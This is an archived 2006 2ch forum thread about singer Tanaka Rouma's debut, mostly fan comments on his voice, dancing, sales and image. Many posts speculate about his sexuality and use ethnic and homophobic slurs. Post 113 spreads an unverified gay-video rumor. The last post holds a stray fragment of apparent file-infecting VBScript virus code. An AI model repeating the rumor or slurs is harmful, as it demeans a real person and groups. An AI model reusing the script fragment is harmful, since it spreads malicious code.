2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

田中ロウマ 1

1 :NO MUSIC NO NAME:2006/05/07(日) 15:21:50 ID:YUzPLF0Q
6月7日デビューシングル
「One / No Change No End」

童子−T「better days feat.加藤ミリヤ、田中ロウマ」発売中

公式サイト
http://www.kingrecords.co.jp/tanakaroma/index.html

2 :NO MUSIC NO NAME:2006/05/07(日) 22:08:57 ID:3z9LqPzR
こんなスレが立ってたんだw >>1
「better days」は良かったね。曲的には全然違うけど、
何年か前m-floの「miss you」で当時無名の
melody.&山本領平が光ってたのとイメージダブったよ。
加藤ミリヤは知ってるけど誰だよコイツ!みたいな。

「better days feat.加藤ミリヤ、田中ロウマ」PV
http://www.youtube.com/watch?v=TJjTRRNxwCE&search=Rouma%20miliyah

3 :NO MUSIC NO NAME:2006/05/09(火) 13:52:29 ID:FF1yMkOt
すごく声がいいよね!!

4 :NO MUSIC NO NAME:2006/05/10(水) 07:35:19 ID:hj+mMRmt
歌うますぎ

5 :NO MUSIC NO NAME:2006/05/10(水) 10:28:59 ID:e3gFKX1u
Oneが気に入った。


6 :NO MUSIC NO NAME:2006/05/12(金) 18:44:33 ID:bXsTmzL0
アルバム早く出して

7 :NO MUSIC NO NAME:2006/05/14(日) 17:11:42 ID:X6fI2acq
2006/05/14 17:00-22:00 [VMC] VMC TOP 50 JAPAN (36曲目)
田中ロウマ 「No Change No End」

8 :NO MUSIC NO NAME:2006/05/15(月) 03:42:41 ID:M/YGxD4w
声いいけど新宿二丁目出身のゲイダンサーでセレブ好きで「アメリカンアイドル」とかミーハー出演して不合格した過去を誰も知らない。

9 :NO MUSIC NO NAME:2006/05/15(月) 09:30:08 ID:kfc0gOJZ
昨日オリブロ行った
歌うまいと思ったがMCが痛杉

10 :NO MUSIC NO NAME:2006/05/15(月) 22:55:06 ID:M/YGxD4w
ゲイには人気なのよ〜

11 :NO MUSIC NO NAME:2006/05/16(火) 10:09:36 ID:pg1y4D4w
MCどんなだったの?



12 :NO MUSIC NO NAME:2006/05/16(火) 19:00:04 ID:ANDJxEm3
ゲイって噂きいた事あるけど本当なの?? この人は日本人?

13 :NO MUSIC NO NAME:2006/05/16(火) 19:54:18 ID:0sLNjz2a
本名は「田中ヒロマサ」で帰国子女だよ。トークやPVの衣装見たらゲイっぽいし、サンフランシスコ出身とかジャズダンスうまいからゲイには見えるけど…

詳しくは新宿二丁目へ→

14 :NO MUSIC NO NAME:2006/05/16(火) 20:00:48 ID:ANDJxEm3
去年日本に来て二丁目へ?? 知りあいがロウマのダンスレッスン受けてたけど、普通のお兄さんだって言ってた。

15 :NO MUSIC NO NAME:2006/05/17(水) 15:40:50 ID:zvMR1OBn
帰国子女だからファッションがアメリカンで体型もマッチョだからゲイっぽく見えるだけじゃない?

でも筋肉ムキムキでタンクトップ着てるからゲイには人気出るかも。ゲイの噂が出たって事はブレイクの証拠だからガンバレ。

16 :NO MUSIC NO NAME:2006/05/18(木) 11:45:07 ID:K2ie+/bs
確かにゲイには好かれそう。だからと言って本人がゲイとは限らないしね。

17 :NO MUSIC NO NAME:2006/05/18(木) 12:52:12 ID:xvMo6D1l
ゲイの話題ばっかかよw

もうPV解禁になってるね。
「No Change No End」のダンスはマジでかっこよかった。

18 :NO MUSIC NO NAME:2006/05/21(日) 11:17:48 ID:Vi1OgM7E
別にゲイでもいいんじゃないの?w

>>8
アメリカンアイドル出たのは公式にも載ってるよー
誰も知らないってか、それが売りだと思われ。

清貴と三浦大知の良いとこどりって感じ。
ルックスもまぁまぁだし。期待。

19 :NO MUSIC NO NAME:2006/05/21(日) 20:50:01 ID:c4sLhLR4
One良い!

20 :NO MUSIC NO NAME:2006/05/22(月) 02:09:04 ID:Cv19jfpM
日焼けして髪伸ばせばゲイっぽさも無くなると思うけど
今の状態では正直

    キ     モ     イ

21 :NO MUSIC NO NAME:2006/05/24(水) 01:17:10 ID:6GzdOLki
パッション屋良?

22 :NO MUSIC NO NAME:2006/05/27(土) 01:54:59 ID:4h+J26WR
すごいカッコ良い

23 :NO MUSIC NO NAME:2006/05/27(土) 18:39:19 ID:97EkY2uo
日焼けしたらさらにゲイっぽさ増すだろw

24 :NO MUSIC NO NAME:2006/05/27(土) 18:42:55 ID:2NKBFYBh
昨日、深夜の番組で見たけど・・・
この人、すこし小柄?
筋肉つけてダンスやってるのは日本にまったくいないから新鮮で期待したいけど
ルックスはともかく背が低いとちょっと厳しいなぁ・・・。
韓国のRainとかSE7ENとかのパフォーマンスを見ると見劣りするのは否めない。
2ちゃんでは韓国の歌手や俗にいうK-POPなんかはすぐ攻撃される対象だけど、
日本の男性で踊ってしかも歌も上手にセクシーに歌える人って貴重だからガンバって
このジャンルを開拓して日本の音楽シーンに根付かせてほしい。



25 :NO MUSIC NO NAME:2006/05/27(土) 20:36:45 ID:iGcMdq5B
ジャニーズみたいなのじゃなくって
本格的なダンスやる人は
あのくらいマッチョじゃないとダメだよ。

26 :NO MUSIC NO NAME:2006/05/27(土) 21:11:31 ID:CwU26MIK
人種も違うし、本場の人だから意味も違ってくるかもしれないけど、オマリオンとかも165cmとかでしょ?でも人気あるし。あんまり体格は関係ないと思うよ。


27 :NO MUSIC NO NAME:2006/05/27(土) 22:39:00 ID:lTPxXSQP
>>24
kpopではフツウだよね
日本は男のダンス、肌の露出はタブーみたいな所ある
個人的にはセクシーで好きなんだけどなぁ

28 :NO MUSIC NO NAME:2006/05/27(土) 22:45:40 ID:CwU26MIK
ピやSEVENほどのムキムキはあんまり需要ナシじゃないでしょうか。
多分これはジャニーズの影響でしょうけど。山Pも胸筋見せたりこないだ裸晒した時も大ブーイングですし。
だからこの人も売れるのは厳しいかも。

29 :NO MUSIC NO NAME:2006/05/27(土) 23:23:45 ID:HpXgiCFx
つか、ジャニの肌露出タブーなのはイワシ体型だからでしょ。
あんな痩せぎす見たくも無い、ヲタでもない限り。
だいたい、ジャニーズのダンスってなにあれ?
ミュージカルみたいな東山紀之、堂本光一のターンとかさ、毎回同じw
修二と彰の振りとかさ、、、寒いよね、ああいう日本の男性アイドルの踊り。
まるでモーニング娘を見ている様。

30 :NO MUSIC NO NAME:2006/05/27(土) 23:59:40 ID:IPUDzARW
下手なダンスだから
男性ダンスグループとかに圧力かけて番組出させないようにしてるしね。

ジャニーズいらない

31 :NO MUSIC NO NAME:2006/05/28(日) 00:17:18 ID:Rq6+GVCs
小柄ってほど背は低くないですよ。
筋肉ついているから、少し小さく見えるのかも。



32 :NO MUSIC NO NAME:2006/05/28(日) 01:49:13 ID:W+1D3GoO
>>29
ジャニのミュージカルダンス激しくダサい・・・
バク転すればいいってもんじゃない

対抗馬のビジョン系もやっぱり古い
ダンス甲子園って感じ。
ロウマはやっぱり時差ないね


33 :NO MUSIC NO NAME:2006/05/28(日) 11:16:53 ID:J/uKO6jc
>>1の公式サイト見れない…携帯だから?

34 :NO MUSIC NO NAME:2006/05/28(日) 15:25:09 ID:tJJip8Xe
まだ公式って程のもんじゃない


35 :NO MUSIC NO NAME:2006/05/29(月) 12:58:01 ID:ZlgTTy5i
ピやSEVENみたいに整形してないだけマシ。

36 :NO MUSIC NO NAME:2006/05/29(月) 15:04:01 ID:UaTYHRQV
へ? セブンも整形なの?知らなかった・・・。
っていうかピは整形してあの目なの?

37 :NO MUSIC NO NAME:2006/05/29(月) 15:50:24 ID:y9CkYMxr
ミュージックビデオをMTVやm-onで流れないの?


38 :NO MUSIC NO NAME:2006/05/29(月) 19:50:23 ID:R0RwNUzB
売れたいならちょっと筋肉落とした方がいいかも

39 :NO MUSIC NO NAME:2006/05/29(月) 20:49:53 ID:y9CkYMxr
そこまで筋肉つけてないでしょ、あれぐらいダンスやってるんからちょうどいいよ。

40 :karochin:2006/05/29(月) 22:59:45 ID:qa/lK121
なんだかんだ言う人もいると思うけど、sho-tymeと踊ってる時、見劣りしなかった。画像で(カメラワークとか照明とか)見るのと本人見るのが違う事はたぶん踊ってる人なら理解できると思うんだけど・・・

41 :karochin:2006/05/29(月) 23:34:30 ID:qa/lK121
あの・・だれか答えてくれませんか?L.A.でレッスン受けた方・・・今edgeとか、milleniumとかなにが来てますか?いい先生いたら教えてください!!!!

42 :NO MUSIC NO NAME:2006/05/30(火) 00:53:17 ID:cMnUqpke
体セクシーで良い〜

43 :NO MUSIC NO NAME:2006/05/30(火) 01:31:37 ID:43wwbN7P
チョンっぽい安さが・・・・キングだから?

44 :NO MUSIC NO NAME:2006/05/30(火) 01:34:24 ID:mzSGV19r
>>37
MTVは放送したよ
けどMTVとVMCは画質が悪いからM-ONかSSTVで放送してほしいけど
やる気配がないね・・・。

45 :NO MUSIC NO NAME:2006/05/31(水) 21:41:27 ID:Qmat+z92
PV見たいけどローテーションに入ってないみたいね。
音楽チャンネル一通りチェックしたけど(´・ω・`)

46 :NO MUSIC NO NAME:2006/06/01(木) 18:29:24 ID:Lzrdzc3+
かっこいいな、ロウマ
うまくやればブレイクするかも
まぁ、宣伝しだいだが

47 :NO MUSIC NO NAME:2006/06/02(金) 22:25:12 ID:ZTIOSCoB
>>46
糞ジャニーズが邪魔するから無理っぽい。

48 :NO MUSIC NO NAME:2006/06/02(金) 22:42:13 ID:NYWZiVeQ
何でもジャニのせいにするのやめなよー

49 :NO MUSIC NO NAME:2006/06/03(土) 02:55:43 ID:baPcLvKM
じゃあジャニも圧力かけるのやめたら?
三浦大知とか見ててかわいそう。

50 :NO MUSIC NO NAME:2006/06/03(土) 08:26:00 ID:0l4kkX96
でも、ジャンルがぜんぜん違くないか?
ジャニはセニョリータ系の歌謡曲が主でしょ、タッキー&翼にしても修二と彰、山下智久、kinkiとか・・・w
三浦大地は歌番組出たの見たこと無いね、そういえばソロになって。
事務所の力が弱いのかな?あれでは地道にライブとかで活動してシングル出しても売れないわな。

51 :NO MUSIC NO NAME:2006/06/03(土) 12:09:41 ID:gYsuOsAH
筋肉むきむきの奴らってチビばかり
ざまみろww

52 :NO MUSIC NO NAME:2006/06/03(土) 13:10:15 ID:Piqg+hl+
>>50
ジャニはダンスが下手だから
歌って踊る男には圧力かけるんだよ

因みにw-inds.と大知は事務所は一緒

53 :NO MUSIC NO NAME:2006/06/04(日) 10:39:19 ID:YNIqiC+9
ジャニのヴィジョンファクトリー潰しなんて基本だと思ってたけど
未だに知らない人は知らないのね…
w-indsと三浦大知は絶対にミュージックステーション出れないんだよね。
あの番組とジャニーズの癒着は酷すぎる。毎週必ずジャニーズ関係出てるし。
堂々と口パクやってるし。酷い振り付けでマイク倒しても司会はそのこと触れない。
ワロス

54 :NO MUSIC NO NAME:2006/06/05(月) 00:40:33 ID:ZRh0HwqY
まぁまぁ
自分はジャニも三浦もロウマもみんな好きだから
頑張って欲しいよ

55 :NO MUSIC NO NAME:2006/06/05(月) 18:36:11 ID:5Lt9WXcJ
田中ロウマの詳しい事を知ってる方教えてください。最近この人を知ったので。

56 :NO MUSIC NO NAME:2006/06/05(月) 18:48:50 ID:pVMqeJHS
キングレコードで調べて見ればいい。試聴出来るし

57 :NO MUSIC NO NAME:2006/06/05(月) 18:50:13 ID:pVMqeJHS
>>56追伸
携帯でした

58 :NO MUSIC NO NAME:2006/06/05(月) 19:11:48 ID:beD+eKOt
歌番組とか出ないの?
はやくパフォーマンス見てみたいんだが

59 :NO MUSIC NO NAME:2006/06/05(月) 19:15:30 ID:ZRh0HwqY
歌番組以前に露出が無いよね

60 :NO MUSIC NO NAME:2006/06/05(月) 20:47:07 ID:3L5fNObM
http://love3.2ch.net/test/read.cgi/gaysaloon/1148864788/

61 :NO MUSIC NO NAME:2006/06/06(火) 07:22:39 ID:dKiplu0V
ロウマはホモ?

62 :NO MUSIC NO NAME:2006/06/06(火) 11:28:07 ID:te0c2NtN
今日フラゲの日だよな?
なぁ??
誰もフラゲしねぇの?
誰も買わねぇの??


俺は買わねぇ。聴いたことないから。

63 :NO MUSIC NO NAME:2006/06/06(火) 21:15:12 ID:TMBpN9zA
http://www.youtube.com/watch?v=bdgZQsLc2_A
プロモ

俺は明日買いに行くー

64 :NO MUSIC NO NAME:2006/06/06(火) 21:29:33 ID:gdFjVz8h
振りがくどい、手の動きが終始同じ
全身のショットがなさ杉(チビ隠し?)
ダンス教えてたという割りにダンスを全然前面に出していないのは何故?


声や歌も悪くないが、売れることはなく消えるでしょう
ありがとうございました

65 :NO MUSIC NO NAME:2006/06/07(水) 02:11:49 ID:edIolmah
今日買った。
ONE、スッゲーいい!
ヘビロ決定!

ライブも見に行ったけど踊り、うますぎ!
曲書いて詩も書いて歌って、振り付けして踊って・・・・
って全部やりすぎ感はあるけど、これからに期待!

66 :NO MUSIC NO NAME:2006/06/07(水) 02:43:08 ID:6xubrv8Q
韓国人ぽいな。ピと被る。

67 :NO MUSIC NO NAME:2006/06/07(水) 06:04:23 ID:b2iXQxoo
27:30 MTV フレッシュ 田中ロウマ One

PVくるね

68 :NO MUSIC NO NAME:2006/06/07(水) 12:13:37 ID:5gisspF+
>>67
「One」よりも「No Change No End」が見てー

69 :NO MUSIC NO NAME:2006/06/07(水) 20:15:35 ID:vDoveYIb
もうちょっと高い声に魅力があると思う
better daysが良かったかな

70 :NO MUSIC NO NAME:2006/06/07(水) 20:37:01 ID:Ybf6ttoE
ホモ板で話題になってるよ
http://love3.2ch.net/test/read.cgi/gaysaloon/1148714554/

71 :NO MUSIC NO NAME:2006/06/07(水) 21:28:03 ID:tpVYbWXN
ちんこでかそう!インストアライブないかな?

72 :NO MUSIC NO NAME:2006/06/07(水) 22:43:57 ID:mqfzbIAk
>>71
今度、新宿二丁目でライブやるよ。

73 :NO MUSIC NO NAME:2006/06/07(水) 22:45:59 ID:dnrgJEmf
R&B・SOUL(仮)@2ch掲示板
【イケメン】♪田中ロウマ♪【マッチョ】
http://music4.2ch.net/test/read.cgi/randb/1149307557/

74 :NO MUSIC NO NAME:2006/06/08(木) 17:38:33 ID:iWw6jPgl
きんに君?パッション?

75 :NO MUSIC NO NAME:2006/06/08(木) 19:56:46 ID:0GM7App8
作詞作曲ダンスかぁ
めざせ平成の岡村靖幸ってとこかな

76 :NO MUSIC NO NAME:2006/06/08(木) 22:40:22 ID:PXK1kGyY
なんか違うと思う

77 :NO MUSIC NO NAME:2006/06/09(金) 07:51:49 ID:ORYkOF2c
チョンにしか見えない

78 :NO MUSIC NO NAME:2006/06/09(金) 15:05:00 ID:a3Tbr9+i
うまいけど、ただそれだけって感じだね。
個性を感じない。
私はピのほうが好き

79 :NO MUSIC NO NAME:2006/06/09(金) 21:48:44 ID:zMIPLQyy
もう少し、悪っぽさがないとね
育ちの良さですぎw

80 :NO MUSIC NO NAME:2006/06/11(日) 03:57:17 ID:Gck6w1SI
TVCMで見たがいかにもホモって感じだよな。

>>53
w-indsってジャニーズ事務所じゃないの?

81 :NO MUSIC NO NAME:2006/06/11(日) 07:34:21 ID:FMohGr22
最近でたCDのジャケ見て驚いた。
二重に整形したの?

82 :NO MUSIC NO NAME:2006/06/11(日) 12:42:37 ID:6jxN03cl
>>80
違うよ。彼らはDA PUMPの後輩。
安室やMAXと同じVISIONファクトリー所属。

83 :NO MUSIC NO NAME:2006/06/11(日) 15:49:25 ID:5njR6FVv
声も良いし歌も巧いと思った。でもブレイクはなさそう。

84 :NO MUSIC NO NAME:2006/06/11(日) 16:34:59 ID:bOPLF6NX
なに?このゲイの象徴のような男は?

85 :NO MUSIC NO NAME:2006/06/11(日) 17:52:33 ID:GP2D9iIv
韓国籍の男が日本で産まれてアメリカで育って日本でデビューしたような感じですね

86 :NO MUSIC NO NAME:2006/06/12(月) 09:13:58 ID:0qa02uaF
ダンスがクラシックバレー杉w

87 :NO MUSIC NO NAME:2006/06/12(月) 18:01:54 ID:eNbqoo8S
>>86
見てて綺麗だからいいでないの。

88 :NO MUSIC NO NAME:2006/06/12(月) 18:23:25 ID:Dz2uXXwi
>>86
姿勢がめちゃめちゃ良いよねw

89 :NO MUSIC NO NAME:2006/06/12(月) 23:00:17 ID:mtQP1Ujs
加藤ミリヤと一緒にやってる「better days」ですげーいい声してんなーと思ったけど
ソロは何かR&Bというよりエアロビの兄さんって感じがしてしまう


90 :NO MUSIC NO NAME:2006/06/13(火) 05:50:40 ID:u3DJWz1p
エアロビw
確かにwww

91 :NO MUSIC NO NAME:2006/06/13(火) 08:19:17 ID:qmB6v4Nl
で、オリコンweekly何位なの?

92 :NO MUSIC NO NAME:2006/06/13(火) 15:28:44 ID:Not3BLdB
中山きんにくんに酷似

93 :NO MUSIC NO NAME:2006/06/13(火) 18:00:42 ID:u3DJWz1p
筋肉がセクシーと言うよりゲイっぽい

94 :NO MUSIC NO NAME:2006/06/13(火) 21:37:14 ID:jF6/xsU7
えー('ε';)田口トモロウに見えたんですけどぉ

95 :NO MUSIC NO NAME:2006/06/14(水) 06:13:06 ID:rMdzRFSo
ランキングに入ってないっけよ you大樹契約して見た

96 :NO MUSIC NO NAME:2006/06/14(水) 06:14:12 ID:rMdzRFSo
PVみたいけどどーやって見るの?ってがファイル共有??

97 :NO MUSIC NO NAME:2006/06/14(水) 12:44:58 ID:rUfoT5pl
オリコン54位らしいけど

98 :NO MUSIC NO NAME:2006/06/14(水) 20:33:36 ID:lUrN97hT
54??

99 :NO MUSIC NO NAME:2006/06/15(木) 06:37:08 ID:u6yIkI3a
よく見たら54位だった

100 :NO MUSIC NO NAME:2006/06/15(木) 06:51:07 ID:u6yIkI3a
筋肉がすごいかっこいいな〜〜〜おれもそーなりたい

101 :NO MUSIC NO NAME:2006/06/15(木) 07:44:35 ID:j/quMXtu
このまま消えるくさいなw
しかも童子-Tのバックアップじゃたかが知れてるwwww

102 :NO MUSIC NO NAME:2006/06/15(木) 18:14:10 ID:gJnmrUiW
初動54位って売れてねーw
まぁほとんどプロモーションしないでこの数字だからな

103 :NO MUSIC NO NAME:2006/06/15(木) 23:10:08 ID:nYidTRVa
テレビから曲が聞こえてきて「あ、上手だな」と思って画面見たら、
第一印象が「あ、ゲイだ」だった。
同じように感じてる人多いんだ。

104 :NO MUSIC NO NAME:2006/06/16(金) 00:10:33 ID:yeyU1SYv
化粧落とせよ。別にブサというわけでもないんだから。

105 :NO MUSIC NO NAME:2006/06/16(金) 00:15:42 ID:SospQZBi
てか歌も下手じゃないし日本人にしては
どっちかと言えば上手いし、ダンスはそのへんの
バックダンサーなんかより全然上手い!
ただキングレコードじゃ…難しいだろうな。
もったいない。あと絶対バラードの方が良いはず。

106 :NO MUSIC NO NAME:2006/06/16(金) 01:04:58 ID:8AdC6eHy
日本は男の筋肉に対する拒否感がすごいからね。
どこの国でもsexyの条件なのに、日本は特殊で、敬遠される。
せめてパーカでも羽織って踊った方がいいんじゃないかな?
なんかボディビルダーみたいだし

107 :NO MUSIC NO NAME:2006/06/16(金) 03:16:19 ID:6OomCq88
筋肉に対する拒否感なんてないよw
ただ、背が高くないのにああいう筋肉はちょっとかえって不恰好ではないかと・・・。

108 :NO MUSIC NO NAME:2006/06/16(金) 06:02:29 ID:lk8WMIJN
肩幅が小さいんすよ

109 :NO MUSIC NO NAME:2006/06/16(金) 13:20:14 ID:Y1xbBHHw
>>107
え、そうなの?結構理想体型だと思ったんだけど。

110 :NO MUSIC NO NAME:2006/06/16(金) 20:31:03 ID:Jb5Q84la
この前関西の深夜でまことが司会してる新人を紹介する番組に出てたよ、VTRで。
まことのコメントが「見ましたかこの筋肉美」とか「今関西中に男性ホルモンが・・・」
とかばっかりで曲については全くコメントしてなかったw
隣の女性MCにも(筋肉美について)話を振っていたが「私の範疇じゃない」
みたいなこと言ってたww

111 :NO MUSIC NO NAME:2006/06/17(土) 04:59:46 ID:iDh2XX1u
アメリカ育ちじゃ筋肉付けて当たり前、日本人がヒョロ過ぎ。
それでなくてもアジア系、JAPはナメられるのに。w

112 :NO MUSIC NO NAME:2006/06/17(土) 08:34:24 ID:pd6fK7uM
筋肉つけてもつけなくてもロウマの場合は顔そのものが
ゲイっぽい。

113 :NO MUSIC NO NAME:2006/06/17(土) 17:57:24 ID:Ti//GRAS
ゲイビデオ出演疑惑

44 名前:名無しさん@ソウルいっぱい。 :2006/06/16(金) 15:37:14 ID:Tj37gGHj
ロウマ君て昔、ゲイビデオでてたんじゃないの?。すぐわかったんだけど。持ってるし。

46 名前:名無しさん@ソウルいっぱい。 :2006/06/17(土) 17:26:17 ID:ip/8cC+0
嘘じゃないっぽいね。。ちらほらそのレスみるし。かなり巨根らしい。みたいです!!

114 :NO MUSIC NO NAME:2006/06/17(土) 18:26:42 ID:3/wx46sx
大塚愛がAV出てたってのと変わらないね

115 :NO MUSIC NO NAME:2006/06/17(土) 20:34:45 ID:e4oJpvid
>>113
嘘だろ、多分。
あの手の顔は結構いるよ。当てにならん。顔だけでゲイっぽいとか言われたら、たまったもんじゃないと思うよ。

116 :NO MUSIC NO NAME:2006/06/17(土) 20:43:26 ID:7OPBKT/T
日本には歌って踊れる男性ソロがいないから頑張って欲しいな
あれだけ踊れるのにDVD付がないのが惜しい。アルバムには是非!

117 :NO MUSIC NO NAME:2006/06/17(土) 22:37:15 ID:cZ0bEj7d
昔は自分は世界でひとりぼっちなんじゃないかと孤独で自殺も考えるほどだった

とか

恋に悩む男の子の気持ちを歌詞にした

とか言ってたのが、ゲイじゃないかと思わせるんだよねー

118 :NO MUSIC NO NAME:2006/06/17(土) 22:49:21 ID:e4oJpvid
>>117
そうかぁ?感覚おかしいよ

119 :NO MUSIC NO NAME:2006/06/17(土) 23:20:41 ID:GCIamFJh
>>117
マッキーのセリフかと思いましたわ。

120 :NO MUSIC NO NAME:2006/06/18(日) 00:37:18 ID:pimxr432
JCD16位おめ!

121 :NO MUSIC NO NAME:2006/06/18(日) 05:35:49 ID:c3JbGINw
この人の何人?

122 :NO MUSIC NO NAME:2006/06/18(日) 10:00:54 ID:Rzbc9r3I
今スカパーでPV見た。歌うまくて曲も好き。
あんまりきんに君は好きじゃないけどね・・・・・。

平井堅のバイマイメロディーのPV流れてる。キモイよ。きんに君はちょっと・・・・。

123 :NO MUSIC NO NAME:2006/06/18(日) 12:06:43 ID:m6yII1te
なんでプロフに年齢とか身長・体重が載ってないの!
気になるー。


あと、ゲイっぽいw

124 :NO MUSIC NO NAME:2006/06/18(日) 20:39:35 ID:2e72/1pQ
ただ筋肉付いてるからってゲイっぽいんじゃないんだよね。
筋肉ついてる人を皆ゲイって感じるわけじゃないし。
ホントなんでたろう。身長のわりに筋肉が付きすぎてるからかなぁ。
顔だけだとゲイっぽいってわけでもないような気もする。
全体の雰囲気っていうか。あの衣装で決定的にゲイっぽい。

125 :NO MUSIC NO NAME:2006/06/18(日) 21:10:09 ID:0Tiqa1hr
背低いという時点でダメw
170なさそう・・・最初、期待したけどがっかり。

126 :NO MUSIC NO NAME:2006/06/19(月) 18:49:44 ID:g+RZQiA0
顔いいじゃん、カッコイイと思う。

127 :NO MUSIC NO NAME:2006/06/19(月) 19:33:46 ID:xNiCSVpK
年齢はわかった!25歳らしい。
http://dai-jiro.jugem.jp/?eid=227

128 :NO MUSIC NO NAME:2006/06/19(月) 22:39:08 ID:vM/DJtBb
そんな若くも無いんだね

129 :NO MUSIC NO NAME:2006/06/20(火) 10:10:55 ID:u7gyOOcP
なぜいろんなblogで田中ロウマが韓国人っぽいと言われているか
そろそろ考えようじゃないか。

130 :NO MUSIC NO NAME:2006/06/20(火) 10:31:06 ID:wV1//pCI
韓国人はモムチャン(マッチョ)が多いしダンス系歌手が殆んどだから
ピとか。
アジアR&Bヲタの自分に言わせれば韓国より台湾ぽいけどな



131 :NO MUSIC NO NAME:2006/06/20(火) 12:42:45 ID:WKBI1DWx
台湾ぽいは失礼w

132 :NO MUSIC NO NAME:2006/06/21(水) 03:02:23 ID:9n9eAUab
だいたいピとか日本で売れてないし
それにピってダンスは上手いが歌下手
比べる必要がない

133 :NO MUSIC NO NAME:2006/06/21(水) 03:38:33 ID:lQ0bVP7K
ONEいいね

134 :NO MUSIC NO NAME:2006/06/21(水) 20:44:19 ID:0jyqbSuK
No change No endとoneどっちがいいと思う??

135 :NO MUSIC NO NAME:2006/06/21(水) 20:52:17 ID:B08bghGp
>>134
No Change No End

136 :NO MUSIC NO NAME:2006/06/21(水) 21:57:20 ID:fYEquhG0
流派Rにガンガン出てたけど。(ついでにCMもガンガン)
インタビューとかは普通な感じだよ。見た感じほどゲイって感じはしなかった。

137 :NO MUSIC NO NAME:2006/06/21(水) 22:55:52 ID:cDf74FMe
PVぜんぜーん流れない
MTVもスペシャもm-onもチェックしてるけど・・・

138 :NO MUSIC NO NAME:2006/06/22(木) 03:04:03 ID:AXT/2k2j
歯並び悪いね。 白いけど。 直せばいいのに。

139 :NO MUSIC NO NAME:2006/06/22(木) 05:05:17 ID:E9mGWi6i
>>135
No Change No Endか・・・


140 :NO MUSIC NO NAME:2006/06/22(木) 13:34:06 ID:7RTy6Wc0
2ちゃんは本当にホモネタが好きだな。
アッーとかやらないかとかそこまで流行るのかわからないし
平井堅のスレなんてホモネタが殆どと言う始末



141 :NO MUSIC NO NAME:2006/06/22(木) 17:14:07 ID:n8H/h8hA
筒井道隆?

142 :NO MUSIC NO NAME:2006/06/22(木) 22:25:57 ID:9PBnryVA
CD聴いた感じでは歌うまいじゃん!

なんでこんな格好でやらせるかな〜誰かも言ってるけどプロモ次第では売れると思う
でも売れてる歌手ってキャラも良い感じで、ライブのMCとかでもファンをひきつけてるから、上の方で田中ロウマのMCが痛いっていうのは気になるな〜
生の田中ロウマを見てみたい

田中ロウマ応援してます!

143 :NO MUSIC NO NAME:2006/06/22(木) 22:54:49 ID:mqLAiPs1
浅倉大介さんがプロデュースするんでしょ?

144 :NO MUSIC NO NAME:2006/06/23(金) 02:12:47 ID:2xzWVKS8
Avril LavigneのPVそっくりだね。

145 :NO MUSIC NO NAME:2006/06/23(金) 06:53:30 ID:IUgG2d7i
みんなしてゲイとか言うけど歌のほうはうまいからよくね?

146 :NO MUSIC NO NAME:2006/06/23(金) 07:58:22 ID:QeFwQSJl
歌がうまくてもイメージが悪かったら売れないでしょ
あのジャケットは買うのに勇気がいるしw

PVってどの局でよく流れるとか知ってる人がいたら教えてくださいm(__)m

147 :NO MUSIC NO NAME:2006/06/23(金) 10:30:44 ID:m3qbwQI0
>>146
>買うのに勇気がいる
ヘタなケチの付け方すんなよ。要は買いたくないんだろ?素直に言えよ。
大体オマエがロウマのCD買うことを気にするヤツなんてどこにもいねーよ。自意識過剰なんだよ。

148 :NO MUSIC NO NAME:2006/06/23(金) 12:51:19 ID:QeFwQSJl
CD買ったし
自意識過剰でなにが悪い お前に迷惑かけたか?不細工が!見当違いなレスして恥さらしてんじゃねーよ

149 :NO MUSIC NO NAME:2006/06/23(金) 17:08:05 ID:QFfI93jC
>>146
 やっぱあのジャケットは勇気いるな・・・
 流派ーRっていう番組で田中ロウマのことが流れてた。YouTubeで見てみれば?

150 :NO MUSIC NO NAME:2006/06/23(金) 22:58:23 ID:QeFwQSJl
>>149
ユートゥービーはパソコンからしか見れないですよね 自分のパソコン古いから動画見れないときがあるんですよ〜重すぎてorz
ありがとうです!逝ってきます

151 :NO MUSIC NO NAME:2006/06/24(土) 00:49:34 ID:YeVXjL69
三浦大知より拒否してる人多そうだよね

152 :NO MUSIC NO NAME:2006/06/24(土) 02:32:15 ID:Y9+XKUKP
ジャケット気持ち悪い!!何?あのタンクトップ!!



153 :NO MUSIC NO NAME:2006/06/24(土) 08:39:03 ID:1kJLK4l/
たしかにジャケットはキモイけどテレビは( ´Д`)キモくなかったよ

154 :NO MUSIC NO NAME:2006/06/24(土) 15:13:11 ID:dFkITYZr
きっと戦略会議の時に『男版倖田來未』っていうテーマを決めたんだよ。

155 :NO MUSIC NO NAME:2006/06/24(土) 15:33:38 ID:JOMBNW80
筋肉は隠すほうがエロさが増すのに・・・

156 :NO MUSIC NO NAME:2006/06/24(土) 17:00:23 ID:5jocDMRV
で、身長はいくつなん?

157 :NO MUSIC NO NAME:2006/06/25(日) 07:01:32 ID:v7SoaU1q
180くらいじゃない?

158 :NO MUSIC NO NAME:2006/06/25(日) 07:02:23 ID:v7SoaU1q
>>150
 田中ロウマのPVほしい?

159 :NO MUSIC NO NAME:2006/06/26(月) 07:53:52 ID:G24vCMKw
>>158
欲しいです!くださいm(__)m

160 :NO MUSIC NO NAME:2006/06/26(月) 15:53:24 ID:XxQS2yLZ
>>159どーやって送る?

161 :NO MUSIC NO NAME:2006/06/26(月) 17:50:25 ID:hte54yn3
( ´,_ゝ`) プッ

162 :NO MUSIC NO NAME:2006/06/27(火) 03:42:27 ID:+fAhztSQ
半分朝鮮人でしょこの人

163 :NO MUSIC NO NAME:2006/06/27(火) 03:58:04 ID:uzE696cr
純日本人だよ。
ラジオで自分で言ってた。

164 :NO MUSIC NO NAME:2006/06/27(火) 15:08:57 ID:pkYLaAEK
どっかちょろっといじれば爆発的に売れると思う

165 :NO MUSIC NO NAME:2006/06/28(水) 16:29:18 ID:amsZqAIq
あのジャケは売ろうという気持ちがまったく感じられない。

166 :NO MUSIC NO NAME:2006/06/28(水) 20:33:27 ID:22WBpB+7
PVもな。

167 :NO MUSIC NO NAME:2006/06/28(水) 22:25:00 ID:zrn8gG/3
ONEイイネ!!

168 :NO MUSIC NO NAME:2006/06/28(水) 23:49:27 ID:TIGBfZU8
オカマアーティストw

169 :NO MUSIC NO NAME:2006/06/29(木) 14:26:49 ID:j+rGLCws
歌も上手いしトークも面白いですね♪ 体鍛えるはストレス解消になるってラジオで言ってました。

170 :NO MUSIC NO NAME:2006/06/29(木) 21:22:44 ID:PmLM/ugx
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
